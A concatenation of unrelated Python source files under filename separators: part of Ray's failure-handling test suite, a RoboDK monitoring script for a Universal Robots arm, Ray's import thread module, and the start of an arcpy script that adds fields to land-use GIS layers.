errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h():
time.sleep(1)
ray.get(f.remote())
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(h.remote())
[g.remote() for _ in range(num_cpus * 4)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_system_config": {
"object_store_full_max_retries": 0
}
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"object_store_full_max_retries": 0})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = {
"free_objects_batch_size": 1,
}
ray.init(
num_cpus=2,
object_store_memory=10**8,
_lru_evict=True,
_system_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
UR_ActivateMonitoring.py | # This script creates a thread to monitor the position and other variables from a real UR robot
# With this script active, RoboDK will create a new target when the robot is moved a certain tolerance
#
# More information about the RoboDK API here:
# https://robodk.com/doc/en/RoboDK-API.html
# Press F5 to run the script
# Or visit: https://robodk.com/doc/en/PythonAPI/index.html
from robodk.robolink import * # API to communicate with RoboDK
from robodk.robomath import * # Robot toolbox
import threading
import socket
import struct
import os
import time
# Refresh the screen every time the robot position changes
TOLERANCE_JOINTS_REFRESH = 0.1
RETRIEVE_JOINTS_ONCE = False # If True, the current robot position will be retrieved once only
# Create targets given a tolerance in degrees
CREATE_TARGETS = False
TOLERANCE_JOINTS_NEWTARGET = 10 # in degrees
REFRESH_RATE = 0.01
# Make current robot joints accessible in case we run it on a separate thread
global ROBOT_JOINTS
# Procedure to check if robot joint positions are different according to a certain tolerance
def Robot_Joints_Check(jA, jB, tolerance_deg=1):
if jA is None:
return True
for i in range(6):
if abs(jA[i] - jB[i]) > tolerance_deg * pi / 180:
return True
return False
#########################################################################
# Byte shifts to point to the right byte data inside a packet
UR_GET_TIME = 1
UR_GET_JOINT_POSITIONS = 252
UR_GET_JOINT_SPEEDS = 300
UR_GET_JOINT_CURRENTS = 348
UR_GET_TCP_FORCES = 540
# Get packet size according to the byte array
def packet_size(buf):
if len(buf) < 4:
return 0
return struct.unpack_from("!i", buf, 0)[0]
# Check if a packet is complete
def packet_check(buf):
msg_sz = packet_size(buf)
if len(buf) < msg_sz:
print("Incorrect packet size %i vs %i" % (msg_sz, len(buf)))
return False
return True
# Get specific information from a packet
def packet_value(buf, offset, nval=6):
if len(buf) < offset + nval:
print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
return None
format = '!'
for i in range(nval):
format += 'd'
return list(struct.unpack_from(format, buf, offset)) #return list(struct.unpack_from("!dddddd", buf, offset))
# Action to take when a new packet arrives
def on_packet(packet):
global ROBOT_JOINTS
# Retrieve desired information from a packet
rob_joints_RAD = packet_value(packet, UR_GET_JOINT_POSITIONS)
ROBOT_JOINTS = [ji * 180.0 / pi for ji in rob_joints_RAD]
#ROBOT_SPEED = packet_value(packet, UR_GET_JOINT_SPEEDS)
#ROBOT_CURRENT = packet_value(packet, UR_GET_JOINT_CURRENTS)
#print(ROBOT_JOINTS)
# Monitor thread to retrieve information from the robot
def UR_Monitor():
while True:
rt_socket = socket.create_connection((ROBOT_IP, ROBOT_PORT))
buf = b''
packet_count = 0
packet_time_last = time.time()
while True:
more = rt_socket.recv(4096)
if more:
buf = buf + more
if packet_check(buf):
packet_len = packet_size(buf)
packet, buf = buf[:packet_len], buf[packet_len:]
on_packet(packet)
packet_count += 1
if packet_count % 125 == 0:
t_now = time.time()
print("Monitoring at %.1f packets per second" % (packet_count / (t_now - packet_time_last)))
packet_count = 0
packet_time_last = t_now
rt_socket.close()
#########################################################################
# Enter RoboDK IP and Port
ROBOT_IP = None #'192.168.2.31'
ROBOT_PORT = 30003
# Start RoboDK API
RDK = Robolink()
# Retrieve a robot
robot = RDK.ItemUserPick('Select a UR robot to retrieve current position', ITEM_TYPE_ROBOT)
if not robot.Valid():
quit()
# Retrieve Robot's IP:
if ROBOT_IP is None:
ip, port, path, ftpuser, ftppass = robot.ConnectionParams()
ROBOT_IP = ip
ROBOT_JOINTS = None
last_joints_target = None
last_joints_refresh = None
# Start the Robot Monitor thread
#q = queue.Queue()
t = threading.Thread(target=UR_Monitor)
t.daemon = True
t.start()
#UR_Monitor()
# Start the main loop to refresh RoboDK and create targets/programs automatically
target_count = 0
while True:
# Wait for a valid robot joints reading
if ROBOT_JOINTS is None:
continue
# Set the robot to that position
if Robot_Joints_Check(last_joints_refresh, ROBOT_JOINTS, TOLERANCE_JOINTS_REFRESH):
last_joints_refresh = ROBOT_JOINTS
robot.setJoints(ROBOT_JOINTS)
# Stop here if we need only the current position
if RETRIEVE_JOINTS_ONCE:
quit(0)
# Check if the robot has moved enough to create a new target
if CREATE_TARGETS and Robot_Joints_Check(last_joints_target, ROBOT_JOINTS, TOLERANCE_JOINTS_NEWTARGET):
last_joints_target = ROBOT_JOINTS
target_count = target_count + 1
newtarget = RDK.AddTarget('T %i' % target_count, 0, robot)
# Take a short break
pause(REFRESH_RATE)
|
import_thread.py | from collections import defaultdict
import threading
import traceback
import redis
import grpc
import ray
from ray import ray_constants
from ray import cloudpickle as pickle
import ray._private.profiling as profiling
import logging
logger = logging.getLogger(__name__)
class ImportThread:
"""A thread used to import exports from the driver or other workers.
Attributes:
worker: the worker object in this process.
mode: worker mode
redis_client: the redis client used to query exports.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
imported_collision_identifiers: This is a dictionary mapping collision
identifiers for the exported remote functions and actor classes to
the number of times that collision identifier has appeared. This is
used to provide good error messages when the same function or class
is exported many times.
"""
def __init__(self, worker, mode, threads_stopped):
self.worker = worker
self.mode = mode
self.gcs_client = worker.gcs_client
if worker.gcs_pubsub_enabled:
self.subscriber = worker.gcs_function_key_subscriber
self.subscriber.subscribe()
else:
self.subscriber = worker.redis_client.pubsub()
self.subscriber.subscribe(
b"__keyspace@0__:" + ray._private.function_manager.
make_exports_prefix(self.worker.current_job_id))
self.threads_stopped = threads_stopped
self.imported_collision_identifiers = defaultdict(int)
# Keep track of the number of imports that we've imported.
self.num_imported = 0
def start(self):
"""Start the import thread."""
self.t = threading.Thread(target=self._run, name="ray_import_thread")
# Making the thread a daemon causes it to exit
# when the main thread exits.
self.t.daemon = True
self.t.start()
def join_import_thread(self):
"""Wait for the thread to exit."""
self.t.join()
def _run(self):
try:
self._do_importing()
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
if self.worker.gcs_pubsub_enabled:
key = self.subscriber.poll()
if key is None:
# subscriber has closed.
break
else:
msg = self.subscriber.get_message()
if msg is None:
self.threads_stopped.wait(timeout=0.01)
continue
if msg["type"] == "subscribe":
continue
self._do_importing()
except (OSError, redis.exceptions.ConnectionError, grpc.RpcError) as e:
logger.error(f"ImportThread: {e}")
finally:
# Close the Redis / GCS subscriber to avoid leaking file
# descriptors.
self.subscriber.close()
def _do_importing(self):
while True:
export_key = ray._private.function_manager.make_export_key(
self.num_imported + 1, self.worker.current_job_id)
key = self.gcs_client.internal_kv_get(
export_key, ray_constants.KV_NAMESPACE_FUNCTION_TABLE)
if key is not None:
self._process_key(key)
self.num_imported += 1
else:
break
def _get_import_info_for_collision_detection(self, key):
"""Retrieve the collision identifier, type, and name of the import."""
if key.startswith(b"RemoteFunction"):
collision_identifier, function_name = self._internal_kv_multiget(
key, ["collision_identifier", "function_name"])
return (collision_identifier,
ray._private.utils.decode(function_name.encode()),
"remote function")
elif key.startswith(b"ActorClass"):
collision_identifier, class_name = self._internal_kv_multiget(
key, ["collision_identifier", "class_name"])
return collision_identifier, ray._private.utils.decode(
class_name.encode()), "actor"
def _process_key(self, key):
"""Process the given export key from redis."""
if self.mode != ray.WORKER_MODE:
# If the same remote function or actor definition appears to be
# exported many times, then print a warning. We only issue this
# warning from the driver so that it is only triggered once instead
# of many times. TODO(rkn): We may want to push this to the driver
# through Redis so that it can be displayed in the dashboard more
# easily.
if (key.startswith(b"RemoteFunction")
or key.startswith(b"ActorClass")):
collision_identifier, name, import_type = (
self._get_import_info_for_collision_detection(key))
self.imported_collision_identifiers[collision_identifier] += 1
if (self.imported_collision_identifiers[collision_identifier]
== ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD):
logger.warning(
"The %s '%s' has been exported %s times. It's "
"possible that this warning is accidental, but this "
"may indicate that the same remote function is being "
"defined repeatedly from within many tasks and "
"exported to all of the workers. This can be a "
"performance issue and can be resolved by defining "
"the remote function on the driver instead. See "
"https://github.com/ray-project/ray/issues/6240 for "
"more discussion.", import_type, name,
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD)
if key.startswith(b"RemoteFunction:"):
# TODO (Alex): There's a race condition here if the worker is
# shutdown before the function finished registering (because core
# worker's global worker is unset before shutdown and is needed
# for profiling).
# with profiling.profile("register_remote_function"):
(self.worker.function_actor_manager.
fetch_and_register_remote_function(key))
elif key.startswith(b"FunctionsToRun:"):
with profiling.profile("fetch_and_run_function"):
self.fetch_and_execute_function_to_run(key)
elif key.startswith(b"ActorClass:"):
# Keep track of the fact that this actor class has been
# exported so that we know it is safe to turn this worker
# into an actor of that class.
self.worker.function_actor_manager.imported_actor_classes.add(key)
with self.worker.function_actor_manager.cv:
# Function manager may be waiting on actor class to be
# loaded for deserialization, notify it to wake up and
# check if the actor class it was looking for is loaded
self.worker.function_actor_manager.cv.notify_all()
# TODO(rkn): We may need to bring back the case of
# fetching actor classes here.
else:
assert False, "This code should be unreachable."
def fetch_and_execute_function_to_run(self, key):
"""Run on arbitrary function on the worker."""
(job_id, serialized_function) = self._internal_kv_multiget(
key, ["job_id", "function"])
if self.worker.mode == ray.SCRIPT_MODE:
return
try:
# FunctionActorManager may call pickle.loads at the same time.
# Importing the same module in different threads causes deadlock.
with self.worker.function_actor_manager.lock:
# Deserialize the function.
function = pickle.loads(serialized_function)
# Run the function.
function({"worker": self.worker})
except Exception:
# If an exception was thrown when the function was run, we record
# the traceback and notify the scheduler of the failure.
traceback_str = traceback.format_exc()
# Log the error message.
ray._private.utils.push_error_to_driver(
self.worker,
ray_constants.FUNCTION_TO_RUN_PUSH_ERROR,
traceback_str,
job_id=ray.JobID(job_id))
def _internal_kv_multiget(self, key, fields):
vals = self.gcs_client.internal_kv_get(
key, ray_constants.KV_NAMESPACE_FUNCTION_TABLE)
if vals is None:
vals = {}
else:
vals = pickle.loads(vals)
return (vals.get(field) for field in fields)
|
TQ.py | # -*- coding:utf-8 -*-
import arcpy
import os
import shutil
import time
import multiprocessing
def currentTime():
return time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())
# function
#Monitoring变化监测数据集Monitor图层批量添加字段
# inShp:Monitor_AddFields函数输入参数,必须为矢量数据图层
def Monitor_AddFields(inShp):
print inShp
fields = arcpy.ListFields(inShp)
Flds = []
for f in fields:
Flds.append(f.name)
print Flds
print "创建字段。"
if "Prj_ID" not in Flds:
arcpy.AddField_management(inShp, "Prj_ID", "TEXT", "", "", "10")
arcpy.AddMessage("Add field Prj_ID successfully!")
if "QSX" not in Flds:
arcpy.AddField_management(inShp, "QSX", "TEXT", "", "", "10")
arcpy.AddMessage("Add field QSX successfully!")
if "HSX" not in Flds:
arcpy.AddField_management(inShp, "HSX", "TEXT", "", "", "10")
arcpy.AddMessage("Add field HSX successfully!")
if "TBLX" not in Flds:
arcpy.AddField_management(inShp, "TBLX", "TEXT", "", "", "4")
arcpy.AddMessage("Add field TBLX successfully!")
if "BZ" not in Flds:
arcpy.AddField_management(inShp, "BZ", "TEXT", "", "", "50")
arcpy.AddMessage("Add field BZ successfully!")
if "TBMJ" not in Flds:
arcpy.AddField_management(inShp, "TBMJ", "FLOAT", 8, 2)
arcpy.AddMessage("Add field TBMJ successfully!")
if "Dist_Name" not in Flds:
arcpy.AddField_management(inShp, "Dist_Name", "TEXT", "", "", "50")
arcpy.AddMessage("Add field Dist_Name successfully!")
if "Dist_Code" not in Flds:
arcpy.AddField_management(inShp, "Dist_Code", "TEXT", "", "", "6")
arcpy.AddMessage("Add field Dist_Code successfully!")
if "Unique_Cod" not in Flds:
arcpy.AddField_management(inShp, "Unique_Cod", "TEXT", "", "", "25")
arcpy.AddMessage("Add field Unique_Code successfully!")
# function
# Landuse数据集批量添加字段
# inShp:Landuse_AddFields函数输入参数,必须为矢量数据图层
def Landuse_AddFields(inShp):
print "创建字段。"
try:
arcpy.AddField_management(inShp, "Prj_ID", "TEXT", "", "", "10")
arcpy.AddMessage("Add field Prj_ID successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:Prj_ID")
try:
arcpy.AddField_management(inShp, "Phase", "TEXT", "", "", "10")
arcpy.AddMessage("Add field Phase successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:Phase")
try:
arcpy.AddField_management(inShp, "ID_src", "TEXT", "", "", "4")
arcpy.AddMessage("Add field ID_src successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:ID_src")
try:
arcpy.AddField_management(inShp, "Name_src", "TEXT", "", "", "50")
arcpy.AddMessage("Add field Name_src successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:Name_src")
try:
arcpy.AddField_management(inShp, "ID_db", "TEXT", "", "", "4")
arcpy.AddMessage("Add field ID_db successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:ID_db")
try:
arcpy.AddField_management(inShp, "Name_db", "TEXT", "", "", "50")
arcpy.AddMessage("Add field Name_db successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:Name_db")
try:
arcpy.AddField_management(inShp, "Image_src", "TEXT", "", "", "50")
arcpy.AddMessage("Add field Image_src successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:Image_src")
try:
arcpy.AddField_management(inShp, "Dist_Code", "TEXT", "", "", "6")
arcpy.AddMessage("Add field Dist_Code successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:Dist_Code")
try:
arcpy.AddField_management(inShp, "Unique_Cod", "TEXT", "", "", "25")
arcpy.AddMessage("Add field Dist_Code successfully!")
except IOError, e:
arcpy.AddMessage("already have the field:Dist_Code")
arcpy.AddMessage("Add fields finished!")
print "finish"
def Image_src_sde(landuse, image):
icursor = arcpy.SearchCursor(image)
arcpy.MakeFeatureLayer_management(image, "imlyr")
arcpy.MakeFeatureLayer_management(landuse, "lulyr")
for row in icursor:
gpid = row.getValue("Name")
# print gpid
gpidV = '"' + gpid + '"'
# print gpidV
express = '"Name" =' + "'" + gpid + "'"
print express
arcpy.SelectLayerByAttribute_management("imlyr", "NEW_SELECTION", express)
arcpy.SelectLayerByLocation_management("lulyr", "INTERSECT", "imlyr","","NEW_SELECTION")
arcpy.SelectLayerByAttribute_management("lulyr", "SUBSET_SELECTION", "\"PRJ_ID\" = '15.A90'")
arcpy.CalculateField_management("lulyr", "IMAGE_SRC", gpidV, "PYTHON_9.3", "")
arcpy.CalculateField_management("lulyr", "Phase", "!Image_src![13:21]", "PYTHON_9.3", "")
arcpy.SelectLayerByAttribute_management("imlyr", "CLEAR_SELECTION")
arcpy.SelectLayerByAttribute_management("lulyr", "CLEAR_SELECTION")
arcpy.Delete_management("imlyr")
arcpy.Delete_management("lulyr")
# function
# Image_src函数是计算输入landuse图层的“Image_src”字段
# landuse:Image_src函数输入参数,是Landuse数据集的图层,必须为矢量数据图层
# image:Image_src函数输入参数,是影像的矢量框,其属性表含name字段,属性值表示影像的名称,必须为矢量数据图层
def Image_src(landuse, image):
icursor = arcpy.SearchCursor(image)
arcpy.MakeFeatureLayer_management(image, "imlyr")
arcpy.MakeFeatureLayer_management(landuse, "lulyr")
for row in icursor:
gpid = row.getValue("Name")
# print gpid
gpidV = '"' + gpid + '"'
# print gpidV
express = '"Name" =' + "'" + gpid + "'"
print currentTime(),"-",express
arcpy.SelectLayerByAttribute_management("imlyr", "NEW_SELECTION", express)
arcpy.SelectLayerByLocation_management("lulyr", "HAVE_THEIR_CENTER_IN", "imlyr")
arcpy.CalculateField_management("lulyr", "Image_src", gpidV, "PYTHON_9.3", "")
# arcpy.CalculateField_management("lulyr", "Phase", "!Image_src![13:21]", "PYTHON_9.3", "") # Mid( [IMAGE_SRC],13,4 )+"-"+Mid( [IMAGE_SRC],17,2 )+"-"+Mid( [IMAGE_SRC],19,2 )
